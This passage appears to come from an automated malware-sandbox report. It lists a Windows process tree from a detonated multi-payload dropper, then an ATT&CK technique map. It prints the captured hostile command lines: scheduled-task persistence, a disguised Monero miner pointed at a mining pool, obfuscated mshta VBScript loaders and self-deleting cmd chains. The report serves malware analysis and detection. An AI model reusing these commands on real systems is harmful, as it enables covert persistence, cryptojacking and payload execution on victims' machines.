        PID:4120
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 676
        6⤵
        Program crash
        
        PID:5332
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 640
        6⤵
        Program crash
        
        PID:5808
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 696
        6⤵
        Program crash
        
        PID:828
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 888
        6⤵
        Program crash
        
        PID:5380
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 936
        6⤵
        Program crash
        
        PID:4120
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1148
        6⤵
        Program crash
        
        PID:2816
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1088
        6⤵
        Program crash
        
        PID:4484
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11f251db82fb7b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3292
    - - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11f251db82fb7b.exe
        
        Tue11f251db82fb7b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:376
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4548
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:6060
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:1848
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        
        PID:5752
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:6456
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:4944
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:1348
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:6972
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        
        PID:2332
        
        C:\Users\Admin\AppData\Roaming\4546006.exe
        
        "C:\Users\Admin\AppData\Roaming\4546006.exe"
        8⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Roaming\3516602.exe
        
        "C:\Users\Admin\AppData\Roaming\3516602.exe"
        8⤵
        
        PID:5564
        
        C:\Users\Admin\AppData\Roaming\6142852.exe
        
        "C:\Users\Admin\AppData\Roaming\6142852.exe"
        8⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        
        PID:5420
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        9⤵
        
        PID:6584
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:2184
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 804
        8⤵
        Program crash
        
        PID:664
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 840
        8⤵
        Program crash
        
        PID:5404
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 888
        8⤵
        Program crash
        
        PID:5820
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 892
        8⤵
        Program crash
        
        PID:1324
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 960
        8⤵
        Program crash
        
        PID:5312
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 976
        8⤵
        Program crash
        
        PID:5836
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 1336
        8⤵
        Program crash
        
        PID:680
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 1392
        8⤵
        Program crash
        
        PID:2704
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 1408
        8⤵
        Program crash
        
        PID:5304
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 1360
        8⤵
        Executes dropped EXE
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:2332
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\is-CCPLI.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CCPLI.tmp\setup_2.tmp" /SL5="$101EC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1332
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\is-FQ9UQ.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FQ9UQ.tmp\setup_2.tmp" /SL5="$201F6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        
        PID:2532
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:1352
        
        C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe"
        7⤵
        Executes dropped EXE
        
        PID:444
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Alfanewfile2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Alfanewfile2.exe" & del C:\ProgramData\*.dll & exit
        8⤵
        Executes dropped EXE
        
        PID:4380
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Alfanewfile2.exe /f
        9⤵
        Kills process with taskkill
        
        PID:3812
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:4428
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue118f55232e4.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4344
    - - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue118f55232e4.exe
        
        Tue118f55232e4.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:668
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:1200
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2608
    - - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue112c483dd3245d.exe
        
        Tue112c483dd3245d.exe
        5⤵
        Executes dropped EXE
        
        PID:536
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Tue112c483dd3245d.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue112c483dd3245d.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:2248
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Tue112c483dd3245d.exe /f
        7⤵
        Kills process with taskkill
        
        PID:4128
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:6988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4608
    - - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11141271fbe5877f.exe
        
        Tue11141271fbe5877f.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4060
      - C:\ProgramData\957068.exe
        
        "C:\ProgramData\957068.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4616
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4616 -s 1936
        7⤵
        Program crash
        
        PID:6912
      - C:\ProgramData\2849716.exe
        
        "C:\ProgramData\2849716.exe"
        6⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:1168
      - C:\ProgramData\443830.exe
        
        "C:\ProgramData\443830.exe"
        6⤵
        
        PID:4248
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\ProgramData\443830.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\ProgramData\443830.exe"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )
        7⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c TypE "C:\ProgramData\443830.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\ProgramData\443830.exe" ) do taskkill /Im "%~NxB" /F
        8⤵
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE
        
        GZ9~4QZ~O.EXe -P6_oIH__Ioj5q
        9⤵
        
        PID:5724
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if ""-P6_oIH__Ioj5q "" =="""" for %B iN ( ""C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )
        10⤵
        
        PID:6004
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c TypE "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "-P6_oIH__Ioj5q " =="" for %B iN ( "C:\Users\Admin\AppData\Local\Temp\gZ9~4qZ~O.EXE" ) do taskkill /Im "%~NxB" /F
        11⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S
        10⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /Im "443830.exe" /F
        9⤵
        Kills process with taskkill
        
        PID:996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11e4e580f2e8141a3.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4584
    - - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        Tue11e4e580f2e8141a3.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:616
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        
        PID:4332
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3100
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1352
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4580
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5948
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2828
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3700
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2904
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:680
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2420
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4596
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5272
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6140
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6576
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7036
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5184
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6968
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 24
        7⤵
        Program crash
        
        PID:1480
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6096
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7036
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5996
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6856
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6344
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3824
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4140
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6760
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5004
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5492
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7132
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6552
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6984
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5496
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5344
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5404
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5988
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6164
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6536
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6080
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:376
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6424
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2120
      - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6864
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11bc0507b56295.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3956
    - - C:\Users\Admin\AppData\Local\Temp\7zS080B1544\Tue11bc0507b56295.exe
        
        Tue11bc0507b56295.exe
        5⤵
        
        PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 28
1⤵
- Program crash
PID:4524

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4416
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Executes dropped EXE
  PID:4160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5212

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3812
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:1032

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6588

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6700

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6716

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:5700
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4925A0DE0219D737492933E210510D86 C
  2⤵
  PID:612
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding FE60050899205EC203AD6269F92C656C
  2⤵
  PID:6988
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:5492
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 51E8895FA6FABAA2720560A7B116E296 E Global\MSI0000
  2⤵
  PID:2936

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5160

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2720
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:7088

C:\Users\Admin\AppData\Local\Temp\7ABF.exe
C:\Users\Admin\AppData\Local\Temp\7ABF.exe
1⤵
PID:1044

C:\Users\Admin\AppData\Local\Temp\924F.exe
C:\Users\Admin\AppData\Local\Temp\924F.exe
1⤵
PID:4384

C:\Users\Admin\AppData\Roaming\dihbdaf
C:\Users\Admin\AppData\Roaming\dihbdaf
1⤵
PID:6212

C:\Users\Admin\AppData\Local\Temp\B96F.exe
C:\Users\Admin\AppData\Local\Temp\B96F.exe
1⤵
PID:6100

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:2756

C:\Users\Admin\AppData\Local\Temp\CD95.exe
C:\Users\Admin\AppData\Local\Temp\CD95.exe
1⤵
PID:6184

C:\Users\Admin\AppData\Local\Temp\EAA3.exe
C:\Users\Admin\AppData\Local\Temp\EAA3.exe
1⤵
PID:5408

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

